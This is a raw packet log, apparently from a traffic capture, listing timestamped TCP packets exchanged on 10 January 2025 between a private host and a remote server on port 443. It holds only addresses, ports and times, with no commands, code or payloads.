                                                                                                Jan 10, 2025 07:52:13.833949089 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.849318027 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.849361897 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.849391937 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.849401951 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.849422932 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.849443913 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.850147009 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.850191116 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.850210905 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.850225925 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.850249052 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.850265980 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.851129055 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.851174116 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.851198912 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.851205111 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.851233006 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.851249933 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.870440006 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.870491028 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.870516062 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.870524883 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.870553017 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.870567083 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.890247107 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.890290022 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.890316010 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.890324116 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.890352964 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.890372992 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.901696920 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.901743889 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.901765108 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.901772022 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.901798010 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.901813030 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.910001040 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.910046101 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.910080910 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.910088062 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.910101891 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.910125971 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.926456928 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.926501036 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.926522970 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.926531076 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.926561117 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.926580906 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.943418980 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.943494081 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.943511963 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.943521023 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.943547010 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.943567038 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.944345951 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.944395065 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.944412947 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.944421053 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.944447994 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.944463968 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.945292950 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.945338011 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.945365906 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.945373058 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.945400953 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.945410013 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.962918043 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.962938070 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.962985039 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.962990999 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.963017941 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.963035107 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.984532118 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.984586000 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.984603882 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.984626055 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.984647989 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.984672070 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.994046926 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.994066000 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.994117022 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.994129896 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.994144917 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.994168997 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.002985954 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.003004074 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.003056049 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.003066063 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.003082037 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.003139973 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.018945932 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.018976927 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.019030094 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.019041061 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.019067049 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.019084930 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.034501076 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.034524918 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.034645081 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.034674883 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.034730911 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.035118103 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.035135984 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.035248041 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.035255909 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.035336971 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.036040068 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.036058903 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.036183119 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.036190987 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.036262989 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.056206942 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.056262970 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.056320906 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.056330919 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.056349993 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.056560040 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.075356007 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.075404882 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.075622082 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.075622082 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.075633049 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.075671911 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.086683989 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.086735010 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.086785078 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.086785078 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.086800098 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.086955070 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.094893932 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.094949007 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.095019102 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.095019102 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.095026970 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.095134974 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.111552954 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.111604929 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.111785889 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.111795902 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.111834049 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.126760006 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.126805067 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.126888990 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.126895905 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.126955986 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.127016068 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.127588987 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.127657890 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.127696037 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.127701998 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.127907038 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.127907038 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.128492117 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.128534079 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.128679991 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.128679991 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.128688097 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.129092932 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.147903919 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.147948980 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.148006916 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.148015976 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.148027897 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.148087025 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.167706966 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.167753935 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.167795897 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.167804003 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.167838097 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.167853117 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.179024935 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.179088116 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.179158926 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.179158926 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.179166079 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.179217100 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.187243938 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.187287092 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.187333107 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.187340021 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.187371969 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.187391996 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.204257011 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.204302073 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.204360962 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.204368114 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.204396963 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.204459906 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.220139027 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.220199108 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.220227957 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.220238924 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.220288992 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.220288992 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.221040010 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.221082926 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.221144915 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.221160889 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.221183062 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.221220970 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.222227097 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.222270012 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.222302914 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.222309113 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.222376108 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.222376108 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.245116949 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.245171070 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.245258093 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.245259047 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.245282888 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.245326996 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.261183977 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.261234999 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.261415005 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.261415005 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.261425018 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.261728048 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.272696018 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.272741079 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.272798061 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.272806883 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.272842884 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.272856951 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.280728102 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.280741930 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.280831099 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.280838013 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.280906916 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.297302008 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.297367096 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.297437906 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.297437906 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.297446012 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.297514915 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.312587023 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.312640905 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.312680960 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.312686920 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.312735081 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.312735081 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.313618898 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.313669920 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.313729048 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.313729048 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.313736916 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.313783884 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.314671040 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.314733028 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.314783096 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.314790010 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.314816952 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.314841986 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.334933043 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.334976912 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.335004091 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.335011005 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.335134983 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.335134983 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.353446960 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.353513956 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.353586912 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.353586912 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.353596926 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.353935003 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.365117073 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.365164042 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.365231037 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.365231037 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.365240097 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.365291119 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.374758005 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.374804974 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.374835968 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.374844074 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.374891043 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.374927044 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.400255919 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.400296926 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.400373936 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.400373936 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.400386095 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.400473118 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.421823025 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.421885967 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.421938896 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.421952009 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.422020912 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.422020912 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.422441006 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.422496080 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.422542095 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.422548056 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.422662020 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.422662020 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.423438072 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.423492908 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.423544884 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.423564911 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.423585892 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.423681974 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.445805073 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.445867062 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.445916891 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.445924997 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.446130037 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.446130037 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.473529100 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.473604918 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.473656893 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.473664045 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.473757982 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.473757982 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.488914013 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.488967896 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.489135981 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.489135981 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.489142895 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.489206076 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.502763987 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.502789021 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.502861977 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.502868891 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.502887011 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.502912998 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:14.535929918 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.535955906 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:14.536084890 CET49751443192.168.2.947.79.66.76
